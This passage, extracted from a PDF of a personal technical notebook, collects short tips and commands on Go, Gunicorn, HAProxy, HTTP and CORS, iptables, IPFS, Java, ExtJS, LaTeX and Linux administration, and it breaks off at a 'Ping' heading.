Go-Lang

Contents:

20.1 Tips

20.1.1 Builtin function http://golang.org/pkg/builtin/

20.1.2 Introduction to go programming language

Define slice package main import "fmt" func main() {

var slice_1 []int slice_2 :=[] int {} slice_3 := make([]int,0)

var slice_4 = []int {1,2,3,4} slice_5 :=[] int {1,2,3,4}

slice_6 := make([]int,0) slice_6 = append(slice_6,1,2,3,4)

slice_7 := slice_4[:] slice_8 := slice_5[0:4] (continues on next page)

127 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page)

slice_9 := make([]int,4) // [0 0 0 0] copy(slice_9, slice_4)

fmt.Println(slice_1, slice_2, slice_3, slice_4, slice_5, slice_6, slice_7, slice_

˓→8, slice_9) } // [] [] [] [1 2 3 4] [1 2 3 4] [1 2 3 4] [1 2 3 4] [1 2 3 4] [1 2 3 4]

Notes: • The first argument of make, append and copy functions must be slice. • The second argument of copy function also must be slice. (As a special case, it also will copy bytes from a string to a slice of bytes.) • The copy function returns the number of elements copied, which will be the minimum of len(src) and len(dst). package main import "fmt" func main() {

slice_1 :=[] int {1,2,3,4,5} slice_2 :=[] int {11, 22} slice_3 :=[] int {111} slice_4 :=[] int {}

count := copy(slice_1, slice_2) fmt.Println(count, slice_1)

count = copy(slice_3, slice_2) fmt.Println(count, slice_3)

count = copy(slice_4, slice_2) fmt.Println(count, slice_4)

} // 2 [11 22 3 4 5] // 1 [11] // 0 []

20.1.3 SET the GOPATH and GOROOT environments

$ export GOROOT=/usr/lib/go $ export GOPATH=$HOME/go $ export PATH=$PATH:$GOROOT/bin:$GOPATH/bin https://stackoverflow.com/a/43553857

128 Chapter 20. Go-Lang CHAPTER 21

Gunicorn

Contents:

21.1 Tips

21.1.1 Install Gunicorn

$ pip install gunicorn # or $ sudo apt-get install -y gunicorn

21.1.2 Gunicorn config settings http://docs.gunicorn.org/en/stable/settings.html

21.1.3 How Many Workers?

DO NOT scale the number of workers to the number of clients you expect to have. Gunicorn should only need 4-12 worker processes to handle hundreds or thousands of requests per second. Gunicorn relies on the operating system to provide all of the load balancing when handling requests. Generally we recommend (2 x $num_cores) + 1 as the number of workers to start off with. While not overly scientific, the formula is based on the assumption that for a given core, one worker will be reading or writing from the socket while the other worker is processing a request. Obviously, your particular hardware and application are going to affect the optimal number of workers.

129 Omid Raha MyStack Documentation, Release 0.1

Our recommendation is to start with the above guess and tune using TTIN and TTOU signals while the application is under load. Always remember, there is such a thing as too many workers. After a point your worker processes will start thrashing system resources decreasing the throughput of the entire system. http://docs.gunicorn.org/en/latest/design.html#how-many-workers

21.1.4 Choosing a Worker Type

The default synchronous workers assume that your application is resource bound in terms of CPU and network band- width. Generally this means that your application shouldn’t do anything that takes an undefined amount of time. For instance, a request to the internet meets this criteria. At some point the external network will fail in such a way that clients will pile up on your servers. This resource bound assumption is why we require a buffering proxy in front of a default configuration Gunicorn. If you exposed synchronous workers to the internet, a DOS attack would be trivial by creating a load that trickles data to the servers. For the curious, Boom is an example of this type of load. Some examples of behavior requiring asynchronous workers: • Applications making long blocking calls (Ie, external web services) • Serving requests directly to the internet • Streaming requests and responses • Long polling • Web sockets • Comet http://docs.gunicorn.org/en/latest/design.html#choosing-a-worker-type

21.1.5 Worker Processes http://docs.gunicorn.org/en/develop/configure.html#worker-processes

21.1.6 Running Django with Gunicorn - Best Practice http://stackoverflow.com/questions/16857955/running-django-with-gunicorn-best-practice https://docs.djangoproject.com/en/dev/howto/deployment/wsgi/gunicorn/#running-django-in-gunicorn-as-a-generic-wsgi-application http://docs.gunicorn.org/en/0.17.2/deploy.html http://docs.gunicorn.org/en/0.17.2/run.html

130 Chapter 21. Gunicorn Omid Raha MyStack Documentation, Release 0.1

21.1.7 Can’t get access log to work for gunicorn http://docs.gunicorn.org/en/stable/settings.html#logging http://stackoverflow.com/questions/13472842/cant-get-access-log-to-work-for-gunicorn

$ gunicorn web_app.wsgi:application --bind 192.168.1.119:8001 --workers3 --access-

˓→logfile -

21.1.8 Serving a gunicorn app with PyInstaller from gunicorn.app.base import Application, Config import gunicorn from gunicorn import glogging from gunicorn.workers import sync class GUnicornFlaskApplication(Application): def __init__(self, app): self.usage, self.callable, self.prog, self.app= None, None, None, app

def run(self, **options): self.cfg= Config() [self.cfg.set(key, value) for key, value in options.items()] return Application.run(self)

load= lambda self:self.app def app(environ, start_response): data= "Hello, World!\n" start_response("200 OK",[ ("Content-Type", "text/plain"), ("Content-Length", str(len(data))) ])

return iter(data) if __name__== "__main__": gunicorn_app= GUnicornFlaskApplication(app) gunicorn_app.run( worker_class="gunicorn.workers.sync.SyncWorker", https://github.com/benoitc/gunicorn/issues/669#issuecomment-31217831

21.1.9 Serving a pycnic app with gunicorn with PyInstaller import gunicorn from gunicorn.six import iteritems from pycnic.core import WSGI, Handler from gunicorn.app.base import Application from gunicorn.glogging import Logger # needs by pyinstaller from gunicorn.workers import sync # needs by pyinstaller

(continues on next page)

21.1. Tips 131 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) class Hello(Handler): def get(self, name="World"): return {"message": "Hello, %s!"%(name)} class app(WSGI): routes=[ ('/', Hello()), ('/([\w]+)', Hello()) ] class StandaloneApplication(gunicorn.app.base.BaseApplication): def __init__(self, app, options=None): self.options= options or{} self.application= app super(StandaloneApplication, self).__init__()

def load_config(self): config= dict([(key, value) for key, value in iteritems(self.options) if key in self.cfg.settings and value is not None]) for key, value in iteritems(config): self.cfg.set(key.lower(), value)

def load(self): return self.application

StandaloneApplication(app,{}).run() http://docs.gunicorn.org/en/stable/custom.html http://pycnic.nullism.com/docs/getting-started.html#hosting-with-gunicorn

132 Chapter 21. Gunicorn CHAPTER 22

HAPROXY

Contents:

22.1 Tips

22.1.1 Haproxy with docker

$ docker pull haproxy $ docker run --rm -p 80:80 -p 9000:9000 -v ~/workspace/haproxy/haproxy.cfg:/usr/local/etc/haproxy/haproxy.cfg:ro haproxy haproxy.cfg global maxconn 1024 daemon defaults log global mode http option httplog option dontlognull timeout connect 5000 timeout client 50000 timeout server 50000 frontend www-http bind *:80 default_backend web

(continues on next page)

133 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) backend web mode http balance roundrobin option forwardfor http-request set-header X-Forwarded-Port %[dst_port] http-request add-header X-Forwarded-Proto https if { ssl_fc} option httpchk HEAD / HTTP/1.1\r\nHost:localhost server web_01 192.168.1.119:8000 check server web_02 192.168.1.119:8001 check listen status bind *:9000 stats enable stats uri / stats hide-version stats auth admin:admin

The log directive mentions a syslog server to which log messages will be sent. On Ubuntu rsyslog is already installed and running but it doesn’t listen on any IP address. We’ll modify the config files of rsyslog later. The maxconn directive specifies the number of concurrent connections on the frontend. The default value is 2000 and should be tuned according to your VPS’ configuration The connect option specifies the maximum time to wait for a connection attempt to a VPS to succeed. The client and server timeouts apply when the client or server is expected to acknowledge or send data during the TCP process. HAProxy recommends setting the client and server timeouts to the same value. The retries directive sets the number of retries to perform on a VPS after a connection failure. The option redispatch enables session redistribution in case of connection failures. So session stickness is overriden if a VPS goes down. timeout http-request Is the time from the first client byte received, until last byte sent to the client (regardless of keep alive). So if your backend is too slow or the client is sending his request too slow, the whole communication might take longer than this, and the request is dropped (and a timeout sent to the client). timeout http-keep-alive The time to keep a connection open between haproxy and the client (after the client response is sent out). This has nothing to do with the backend response time. This has nothing to do with the length of a single request (i.e. http- request timeout). This allows faster responses if the user requests multiple ressources (i.e. html, img, and js). With keep alive the single requests can make use of the same tcp connection. This way the load time for a full webpage is reduced. timeout server This is the timeout for your backend servers. When reached, haproxy replies with 504 (gateway timeout). This also has nothing to do with keep alive, as it is only about the connection between proxy and backend. https://cbonte.github.io/haproxy-dconv/configuration-1.5.html https://www.digitalocean.com/community/tutorials/how-to-use-haproxy-to-set-up-http-load-balancing-on-an-ubuntu-vps https://cbonte.github.io/haproxy-dconv/configuration-1.5.html#max-spread-checks http://serverfault.com/questions/647060/haproxy-timeout-http-request-vs-timeout-http-keep-alive-vs-timeout-server http://www.slideshare.net/haproxytech/haproxy-best-practice

134 Chapter 22. HAPROXY Omid Raha MyStack Documentation, Release 0.1

http://stackoverflow.com/questions/8750518/difference-between-global-maxconn-and-server-maxconn-haproxy http://stackoverflow.com/questions/28162452/how-to-make-ha-proxy-keepalive http://killtheradio.net/technology/haproxys-keep-alive-functionality-and-how-it-can-speed-up-your-site/ https://github.com/postrank-labs/goliath/wiki/HAProxy https://www.digitalocean.com/community/tutorials/an-introduction-to-haproxy-and-load-balancing-concepts http://neo4j.com/docs/stable/ha-haproxy.html https://serversforhackers.com/load-balancing-with-haproxy https://www.datadoghq.com/blog/monitoring-haproxy-performance-metrics/ On multi-core systems, this setup however can cause problems, as HAproxy is single-threaded - especially on virtual servers like Amazon EC2 and others that give their users many low-power CPU cores that performance per core do not increases - when you buy faster instance you actually get more cores - and in case of Amazon, this is fixed value of 3.25 ECU per core (for m3 instances). This of course causes that HAproxy will have similar performance no matter how big instance is selected. Since version 1.5-dev13 HAproxy offers to split processes and map them to CPU cores. There are 2 options that need to be set: nbproc and cpu-map. To be accurate, nbproc is not new option, it was in 1.4 as well, but now you have control over it which core is doing what. Here is example of simple configuration for system with 4 cores: global nbproc 4 cpu-map 1 0 cpu-map 2 1 cpu-map 3 2 cpu-map 4 3 First number is process starting with “1” and second is CPU core starting with “0”. Above setup will cause haproxy to spread load on all 4 cores equally. But this is just a beginning. You can dedicate only some cores to perform specified operations, for example, for HTTP traffic you would use only 1 dedicated core while 3 other cores can do HTTPS, just add bind-process directive: frontend access_http bind 0.0.0.0:80 bind-process 1 frontend access_https bind 0.0.0.0:443 ssl crt /etc/yourdomain.pem bind-process 2 3 4 You can even separate CPU cores for backend processing. http://blog.onefellow.com/post/82478335338/haproxy-mapping-process-to-cpu-core-for-maximum http://cbonte.github.io/haproxy-dconv/configuration-1.6.html?keyword=nbproc#nbproc http://cbonte.github.io/haproxy-dconv/configuration-1.6.html?keyword=nbproc#cpu-map

22.1.2 Dynamic Backend https://news.ycombinator.com/item?id=5222209 https://github.com/PearsonEducation/thalassa-aqueduct

Hot reconfiguration http://www.haproxy.org/download/1.2/doc/haproxy-en.txt http://comments.gmane.org/gmane.comp.web.haproxy/10565 https://github.com/thisismitch/doproxy http://alex.cloudware.it/2011/10/simple-auto-scale-with-haproxy.html https://www.digitalocean.com/community/tutorials/how-to-automate-the-scaling-of-your-web-application-on-digitalocean

22.1. Tips 135 Omid Raha MyStack Documentation, Release 0.1 https://tech.shareaholic.com/2012/10/26/haproxy-a-substitute-for-amazon-elb/ http://michalf.me/blog:haproxy

136 Chapter 22. HAPROXY CHAPTER 23

HTTP

Contents:

23.1 Tips

23.1.1 HTTP persistent connection

HTTP persistent connection, also called HTTP keep-alive, or HTTP connection reuse, is the idea of using a single TCP connection to send and receive multiple HTTP requests/responses, as opposed to opening a new connection for every single request/response pair. The newer HTTP/2 protocol uses the same idea and takes it further to allow multiple concurrent requests/responses to be multiplexed over a single connection. https://en.wikipedia.org/wiki/HTTP_persistent_connection

23.2 HTTP access control (CORS)

How does Access-Control-Allow-Origin header work? Site B uses Access-Control-Allow-Origin to tell the browser that the content of this page is accessible to certain domains. By default, site B’s pages are not accessible to any other domain; using the ACAO header opens a door for cross-domain access by specific domains. Site B should serve its pages with: Access-Control-Allow-Origin: http://sitea.com Modern browsers will not block cross-domain requests outright. If site A requests a page from site B, the browser will actually fetch the requested page on the network level and check if the response headers list site A as a permitted requester domain. If site B has not indicated that site A is allowed to access this page, the browser will send an error and decide not to provide the response to the requesting JavaScript code. EDIT: What happens on the network level is actually slightly more complex than I suggest here; there is sometimes a data-less “preflight” request when using special headers or HTTP verbs other than GET and POST (e.g. PUT, DELETE). See my answer on Understanding XMLHttpRequest over CORS for more details.

137 Omid Raha MyStack Documentation, Release 0.1 http://stackoverflow.com/a/10636765 Understanding XMLHttpRequest over CORS (responseText) For a “simple” HTTP verb like GET or POST, yes, the entire page is fetched, and then the browser decides whether JavaScript gets to use the contents or not. The server doesn’t need to know where the requests comes from; it is the browser’s job to inspect the reply from the server and determine if JS is permitted to see the contents. For a “non-simple” HTTP verb like PUT or DELETE, the browser issues a “preflight request” using an OPTIONS request. In that case, the browser first checks to see if the domain and the verb are supported, by checking for Access-Control-Allow-Origin and Access-Control-Allow-Methods, respectively. (See the “Handling a Not-So-Simple Request” on the CORS page of HTML5 Rocks for more information.) The preflight response also lists permissible non-simple headers, included in Access-Control-Allow-Headers. This is because allowing a client to send a DELETE request to the server could be very bad, even if JavaScript never gets to see the cross-domain result – again, remember that the server is generally not under any obligation to verify that the request is coming from a legitimate domain (although it may do so using the Origin header from the request). http://stackoverflow.com/a/13400954/710446 https://developer.mozilla.org/en-US/docs/HTTP/Access_control_CORS http://www.html5rocks.com/en/tutorials/cors/

23.3 HTTP Codes

23.3.1 204 No Content

The 204 status code means that the request was received and understood, but that there is no need to send any data back.

23.3.2 301 Moved permanently

Your thinks that your URL has been permanently redirected to another URL. The client system is expected to immediately retry the alternate URL.

23.3.3 302 Moved temporarily

Your Web server thinks that your URL has been temporarily redirected to another URL. The client system is expected to immediately retry the alternate URL.

23.3.4 304 Not Modified

This does not really indicate an error, but rather indicates that the resource for the requested URL has not changed since last accessed or cached.

23.3.5 410 HTTP Error Gone

A 410 status code is returned if the new address is altogether unavailable or the server admin does not want to reveal it. Upon receiving a 410 status code, the client should not request the resource again in the future. Clients such as search engines should remove the resource from their indexes.

138 Chapter 23. HTTP Omid Raha MyStack Documentation, Release 0.1

The requested resource is no longer available at the server and no forwarding address is known. This condition is expected to be considered permanent. Clients with link editing capabilities SHOULD delete references to the Request-URI after user approval. If the server does not know, or has no facility to determine, whether or not the condition is permanent, the status code 404 Not Found SHOULD be used instead.

23.3.6 500 Internal server error

The Web server (running the Web Site) encountered an unexpected condition that prevented it from fulfilling the request by the client (e.g. your Web browser or our CheckUpDown robot) for access to the requested URL. This is a ‘catch-all’ error generated by the Web server. Basically something has gone wrong, but the server can not be more specific about the error condition in its response to the client. In addition to the 500 error notified back to the client, the Web server should generate some kind of internal error log which gives more details of what went wrong. It is up to the operators of the Web server site to locate and analyse these logs.

23.3.7 502 Bad Gateway

A server (not necessarily a Web server) is acting as a gateway or proxy to fulfil the request by the client (e.g. your Web browser) to access the requested URL. This server received an invalid response from an upstream server it accessed to fulfil the request. This usually does not mean that the upstream server is down (no response to the gateway/proxy), but rather that the upstream server and the gateway/proxy do not agree on the protocol for exchanging data. Given that Internet protocols are quite clear, it often means that one or both machines have been incorrectly or incom- pletely programmed.

23.3.8 504 Gateway Timeout

504 gateway timeout is a server error code that is received when serving as a proxy or gateway server. This typically means that it does not receive adequate responses from an upstream server that was specified in the URL. Such as LDAP, FTP, HTTP, or other forms of auxiliary servers that are needed to have access to in order to finish the request being made of it

23.3.9 509 Bandwidth Limit Exceeded

This status code, while used by many servers, is not specified in any RFCs.

23.3. HTTP Codes 139 Omid Raha MyStack Documentation, Release 0.1

140 Chapter 23. HTTP CHAPTER 24

IP Tables

Contents:

24.1 Tips

24.1.1 Open one port

$ sudo iptables -I INPUT -p tcp -s0.0.0.0/0 --dport 8000 -j ACCEPT

141 Omid Raha MyStack Documentation, Release 0.1

142 Chapter 24. IP Tables CHAPTER 25

InterPlanetary File System (IPFS)

Contents:

25.1 Tips

25.1.1 Public IPFS Gateways https://ipfs.github.io/public-gateway-checker/

25.1.2 Docker usage

$ export ipfs_staging= $ export ipfs_data= $ docker run -d --name ipfs_host -v $ipfs_staging:/export -v $ipfs_data:/data/ipfs -p

˓→4001:4001 -p 127.0.0.1:8080:8080 -p 127.0.0.1:5001:5001 ipfs/go-ipfs:latest

Watch log and Wait for ipfs to start:

$ docker logs -f ipfs_host

The ipfs is running when you see this on the log:

Gateway(readonly) server listening on /ip4/0.0.0.0/tcp/8080

Connect to peers:

$ docker exec ipfs_host ipfs swarm peers

Add files:

143 Omid Raha MyStack Documentation, Release 0.1

$ cp -r $ipfs_staging $ docker exec ipfs_host ipfs add -r /export/ https://github.com/ipfs/go-ipfs#docker-usage

25.1.3 Python usage

$ pip install ipfsapi import ipfsapi api= ipfsapi.connect('127.0.0.1', 5001) res= api.add('test.txt') res {'Hash':'QmWxS5aNTFEc9XbMX1ASvLET1zrqEaTssqt33rVZQCQb22','Name':'test.txt'} api.cat(res['Hash']) 'fdsafkljdskafjaksdjf\n' api.id() {'Addresses':['/ip4/127.0.0.1/tcp/4001/ipfs/

˓→QmS2C4MjZsv2iP1UDMMLCYqJ4WeJw8n3vXx1VKxW1UbqHS', '/ip6/::1/tcp/4001/ipfs/QmS2C4MjZsv2iP1UDMMLCYqJ4WeJw8n3vXx1VKxW1UbqHS

˓→'], 'AgentVersion':'go-ipfs/0.4.10', 'ID':'QmS2C4MjZsv2iP1UDMMLCYqJ4WeJw8n3vXx1VKxW1UbqHS', 'ProtocolVersion':'ipfs/0.1.0', 'PublicKey':'CAASpgIwgg ... 3FcjAgMBAAE='} https://github.com/ipfs/py-ipfs-api#usage

144 Chapter 25. InterPlanetary File System (IPFS) CHAPTER 26

IRC

Contents:

26.1 Tips

/msg nickserv info Jerry /whois NickName /nick NICKNAME /msg nickserv register [YOUR PASSWORD] [YOUR EMAIL] /join surena

145 Omid Raha MyStack Documentation, Release 0.1

146 Chapter 26. IRC CHAPTER 27

Java

Contents:

27.1 Tips

(JDK) Java Development Kit (JRE) Java Runtime Environment Standard Edition (JavaSE) Enterprise Edition (JavaEE, also known as J2EE), Mobile Edition (JavaME)

27.1.1 How to install Oracle Java

Download and extract Oracle JDK to the /opt/jdk like path, and then:

$ sudo update-alternatives --install /usr/bin/java java /opt/jdk/jre/bin/java 2000 $ sudo update-alternatives --install /usr/bin/javac javac /opt/jdk/bin/javac 2000

27.1.2 Install Java on ubuntu

$ apt-get install default-jre

This will install the Java Runtime Environment (JRE). If you instead need the Java Development Kit (JDK), which is usually needed to compile Java applications (for example Apache Ant, Apache Maven, Eclipse and IntelliJ IDEA execute the following command:

$ apt-get install default-jdk https://www.digitalocean.com/community/tutorials/how-to-install-java-on-ubuntu-with-apt-get

147 Omid Raha MyStack Documentation, Release 0.1

27.1.3 Switch between installed java

Configures the default for the program “java”. That’s the Java VM

$ sudo update-alternatives --config java

Configures the default Java compiler

$ sudo update-alternatives --config javac

27.2 Introduction to java programming language

$ javac HelloWorld.java $ java -cp . HelloWorld

$ javac -d . SimpleExample.java $ java -cp . com.mynotes.examples.SimpleExample

With the java command, the -cp (class path) option is used to designate where the command should seek out the specified class(es). In this Example. is used to designate that the root directory for the classes is the current local directory. Note the use of the -d parameter with the javac command, which tells the compiler that the destination of the compiled class (SimpleExample) and its directory structure’s root is the local directory in which the Java file is located. What this means is that a directory named com will be created. Within this com directory, an examples directory is placed, and within examples, SimpleExample.class is generated (see Figure 2-1). This http://www.sergiy.ca/how-to-compile-and-launch-java-code-from-command-line/ Package names are all lowercase. Packages in the Java language begin with “java” or “javax.” Generally, companies use their Internet domain in reverse order (so a company like oreilly.com would become com.oreilly, nonprofit.org would become org.nonprofit, etc.). If the domain contains some spe- cial characters (nonalphanumeric) or conflicts with a reserved Java keyword, it is either not used or an underscore (_) is used instead.

27.2.1 In Java, what’s the difference between public, default, protected, and pri- vate? http://stackoverflow.com/questions/215497/in-java-whats-the-difference-between-public-default-protected-and-private Public are accessible from everywhere. Protected are accessible by the classes of the same package and the subclasses residing in any package. Default are accessible by the classes of the same package. private are accessible within the same class only.

27.2.2 When should I use “this” in a class? http://stackoverflow.com/questions/2411270/when-should-i-use-this-in-a-class

148 Chapter 27. Java Omid Raha MyStack Documentation, Release 0.1

27.2.3 Understanding constructors http://www.javaworld.com/article/2076204/core-java/understanding-constructors.html http://www.javabeginner.com/learn-java/java-constructors

27.2. Introduction to java programming language 149 Omid Raha MyStack Documentation, Release 0.1

150 Chapter 27. Java CHAPTER 28

Java Script

Contents:

28.1 Tips

Best JavaScript compressor http://stackoverflow.com/questions/28932/best-javascript-compressor http://documentcloud.github.io/jammit/ Best Practices for Speeding Up Your Web Site http://developer.yahoo.com/performance/rules.html Minimize round-trip times https://developers.google.com/speed/docs/best-practices/rtt?csw=1#MinimizeDNSLookups

28.1.1 Installing Bower

$ sudo npm install -g bower $ sudo ln -s /usr/bin/nodejs /usr/bin/node https://bower.io/ http://stackoverflow.com/a/22791301

28.2 ExtJS

28.2.1 Sencha Cmd

Upgrading Sencha Cmd

151 Omid Raha MyStack Documentation, Release 0.1

$ sencha upgrade --check $ sencha upgrade

$ sencha upgrade --check --beta $ sencha upgrade --beta

Generating Your Application

$ sencha -sdk /path/to/sdk generate app MyApp /path/to/MyApp $ sencha -sdk /home/omidraha/Tools/js/Sencha/Sencha\ Ext\ JS/ext-4.2.1.883/ generate

˓→app hello /home/omidraha/Prj/Sencha/ExtJS/hello

Building Your Application

$ sencha app build

Generating a Workspace

$ sencha generate workspace /path/to/workspace

Generating Pages

$ sencha -sdk /path/to/ext generate app ExtApp /path/to/workspace/extApp $ sencha -sdk /path/to/touch generate app TouchApp /path/to/workspace/touchApp

Generate Local Packages sencha generate package -type code foo

Then add “common” as a requirement to your application’s “app.json”:

{ "name": "MyApp", "requires":[ "foo" ] }

Building The Package

$ sencha package build

152 Chapter 28. Java Script CHAPTER 29

Latex

Contents:

29.1 Tips

$ sudo apt-get install texlive-xetex $ sudo apt-get install texlive-lang-arabic

29.1.1 Write Persian in Latex

Use bidi package and RTL :

\documentclass[12pt,a4paper,oneside]{report}

\usepackage[utf8]{inputenc} \usepackage{fontspec} \setmainfont{B Nazanin} \usepackage{bidi} \RTL \begin{document} \textbf{!} ! \end{document}

Use xepersian package:

\documentclass[12pt,a4paper,oneside]{report}

\usepackage[utf8]{inputenc} \usepackage{fontspec} \usepackage{xepersian} (continues on next page)

153 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) \settextfont{B Nazanin} \setlatintextfont{Lato Thin}

\begin{document} \textbf{!} ! \end{document}

Generate pdf file:

$ xelatex sample.tex

154 Chapter 29. Latex CHAPTER 30

Linux

Contents:

30.1 Cmds

30.1.1 Add User

$ sudo adduser

30.1.2 Delete a User

$ sudo deluser $ sudo userdel

If, instead, you want to delete the user’s home directory when the user is deleted, you can issue the following command as root:

$ sudo deluser --remove-home $ sudo deluser -r $ sudo userdel -r

30.1.3 Changing User Password

$ sudo passwd

155 Omid Raha MyStack Documentation, Release 0.1

30.1.4 Allowing other users to run sudo

$ sudo adduser sudo $ sudo visudo # $ vim /etc/sudoers # User privilege specification root ALL=(ALL:ALL) ALL or ALL=(ALL:ALL) ALL # Allow members of group sudo to execute any command %sudo ALL=(ALL:ALL) ALL http://askubuntu.com/questions/7477/how-can-i-add-a-new-user-as-sudoer-using-the-command-line https://help.ubuntu.com/community/RootSudo#Allowing_other_users_to_run_sudo

30.1.5 Delete a user from one group

$ groupdel group http://www.computerhope.com/unix/groupdel.htm

30.1.6 Remove sudo privileges from a user (without deleting the user)

$ sudo deluser username sudo http://askubuntu.com/a/335989

30.1.7 Users and Groups name list getent passwd | awk -F':' '{ print $1}' getent passwd | awk -F: '{print $1}'| while read name; do groups $name; done kuser(KDE User Manager)

30.1.8 apt-file search

ERROR: cmake/modules/FindKDE4Internal.cmake not found in apt-file search FindKDE4Internal.cmake kdelibs5-dev: /usr/share/kde4/apps/cmake/modules/FindKDE4Internal.cmake

30.1.9 mtu ifconfig eth0 mtu 1400 # 1360, 1406 or 1407 , default is 1500

30.1.10 dpkg-reconfigure

156 Chapter 30. Linux Omid Raha MyStack Documentation, Release 0.1

dpkg-reconfigure kdm dpkg-reconfigure gdm

30.1.11 rfkill

# ifconfig wlan0 up SIOCSIFFLAGS: Operation not possible due to RF-kill

# rfkill list 0: phy0: Wireless LAN Soft blocked: yes Hard blocked: no

# rfkill unblock 0

# rfkill list 0: phy0: Wireless LAN Soft blocked: no Hard blocked: no

# ifconfig wlan0 up

30.1.12 Run wireshark with capture packets privilege http://wiki.wireshark.org/CaptureSetup/CapturePrivileges setcap 'CAP_NET_RAW+eip CAP_NET_ADMIN+eip' /usr/bin/dumpcap groupadd wireshark usermod -a -G wireshark omidraha chgrp wireshark /usr/bin/dumpcap chmod 4750 /usr/bin/dumpcap dpkg-reconfigure wireshark-common

Configuring

˓→wireshark-common

˓→ Dumpcap can be installed in a way that allows members of the "wireshark" system

˓→group to capture packets. This is recommended over the alternative of running Wireshark/Tshark directly as root, because less of the code will run with

˓→elevated privileges.

˓→

˓→ For more detailed information please see /usr/share/doc/wireshark-common/README.

˓→Debian.

˓→ Enabling this feature may be a security risk, so it is disabled by default. If in

˓→doubt, it is suggested to leave it disabled.

˓→ (continues on next page)

30.1. Cmds 157 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) Should non-superusers be able to capture packets?

˓→

˓→

˓→

˓→

˓→

30.1.13 Install, Remove, Purge and get Info of Packages

To install package dpkg -i package-file-name

To remove (uninstall) package dpkg -r package-file-name

To Purge package dpkg -P package-file-name

To get info of package dpkg -l | grep 'package-file-name'

30.1.14 Create A Local Debian Mirror With apt-mirror http://www.howtoforge.com/local_debian_ubuntu_mirror apt-get install apt-mirror vim /etc/apt/mirror.list

set base_path /mnt/sdc1/OR/apt-mirror # set mirror_path $base_path/mirror # set skel_path $base_path/skel # set var_path $base_path/var # set cleanscript $var_path/clean.sh # set defaultarch # set postmirror_script $var_path/postmirror.sh # set run_postmirror 0 set nthreads 20 set _tilde0 deb http://172.16.1.210/repo/debian testing main contrib non-free # 32 bit deb-amd64 http://172.16.1.210/repo/debian testing main contrib non-free #

˓→64 bit # set cleanscript $var_path/clean.sh clean http://172.16.1.210/repo/debian

(continues on next page)

158 Chapter 30. Linux Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) su - apt-mirror -c apt-mirror

/mnt/sdc1/OR/apt-mirror/var/clean.sh

30.1.15 Named pipe

In computing, a named pipe (also known as a FIFO for its behavior) is an extension to the traditional pipe concept on Unix and Unix-like systems, and is one of the methods of inter-process communication (IPC). The concept is also found in , although the semantics differ substantially. A traditional pipe is “unnamed” because it exists anonymously and persists only for as long as the process is running. A named pipe is system-persistent and exists beyond the life of the process and must be deleted once it is no longer being used. Processes generally attach to the named pipes (usually appearing as a file) to perform inter-process communication. Instead of a conventional, unnamed, shell pipeline, a named pipeline makes use of the filesystem. It is explicitly created using mkfifo() or mknod(), and two separate processes can access the pipe by name, one process can open it as a reader, and the other as a writer. mkfifo /tmp/testfifo tail -f /tmp/testfifo and in another console: echo HELLO! > /tmp/testfifo

30.1.16 Give Privilege to a non-root process to bind to ports under 1024 setcap 'cap_net_bind_service=+ep' $(readlink -f`which python` )

30.1.17 How do I test whether a number is prime? http://www.madboa.com/geek/openssl/#prime-test

$ prime 119054759245460753 1A6F7AC39A53511 is not prime

You can also pass hex numbers directly.

$ openssl prime -hex 2f 2F is prime

30.1.18 Download from YouTube https://github.com/rg3/youtube-dl

30.1. Cmds 159 Omid Raha MyStack Documentation, Release 0.1

# apt-get install youtube-dl $ youtube-dl https://www.youtube.com/watch?v=video_id --proxy http://host:port $ youtube-dl -v -i --no-mtime --no-check-certificate --youtube-skip-dash-manifest

˓→https://www.youtube.com/watch?v=video_id

30.1.19 How to use youtube-dl from a python program url= raw_input('URL:') dl= youtube_dl.YoutubeDL({'outtmpl':u' %(id)s.mp4', 'forceduration': True, 'restrictfilenames': True, 'format':'18/22/5', 'writesubtitles': True}) res= dl.extract_info(url) duration= res['duration'] title= res['title'] vid= res['id'] ext= res['ext'] web_page_url= res['webpage_url'] subtitles= entry['subtitles']

Youtube options: https://github.com/rg3/youtube-dl/blob/1ad6b891b21b45830736698a7b59c30d9605a562/youtube_dl/__init__.py# L290

30.1.20 Download Youtube videos with Youtube subtitles on

# To download sub $ youtube-dl --no-mtime --proxy http://127.0.0.1:8080 -f 18 --write-sub URL # To embed sub $ youtube-dl --no-mtime --proxy http://127.0.0.1:8080 -f 18 --embed-subs URL

30.1.21 Redirect output to null

$ echo 123 >/dev/null2>&1

30.1.22 cron

You do not have to restart cron every time you make a change because cron always checks for changes, But to restart cron whenever you made change:

$ sudo service crond restart

In Ubuntu:

160 Chapter 30. Linux Omid Raha MyStack Documentation, Release 0.1

$ sudo service cron status $ sudo service cron restart

Display the current crontab:

$ crontab -l

Edit the current crontab:

$ crontab -e

Syntax of crontab (field description)

***** /path/to/command arg1 arg2

***** command to be executed ----- | | | | | | | | | ----- Day of week(0-7)(Sunday=0 or7) | | | ------Month(1- 12) | | ------Day of month(1- 31) | ------Hour(0- 23) ------Minute(0- 59)

How do I use operators? An operator allows you to specifying multiple values in a field. There are three operators: The asterisk (*): This operator specifies all possible values for a field. For example, an asterisk in the hour time field would be equivalent to every hour or an asterisk in the month field would be equivalent to every month. The comma (,): This operator specifies a list of values, for example: “1,5,10,15,20, 25”. The dash (-): This operator specifies a range of values, for example: “5-15” days , which is equivalent to typing “5,6,7,8,9,. . . .,13,14,15” using the comma operator. The separator (/): This operator specifies a step value, for example: “0-23/” can be used in the hours field to specify command execution every other hour. Steps are also permitted after an asterisk, so if you want to say every two hours, just use */2. Resources: http://www.cyberciti.biz/faq/how-do-i-add-jobs-to-cron-under-linux-or-unix-oses/ http://www.thegeekstuff.com/2011/12/crontab-command/ http://www.computerhope.com/unix/ucrontab.htm http://crontab.guru/

30.1.23 Generate random base64 characters

$ openssl rand -base64 741

30.1. Cmds 161 Omid Raha MyStack Documentation, Release 0.1

30.1.24 Set Socket Buffer Sizes

# sysctl -w net.core.rmem_max=2096304 # sysctl -w net.core.wmem_max=2096304

30.1.25 Ping

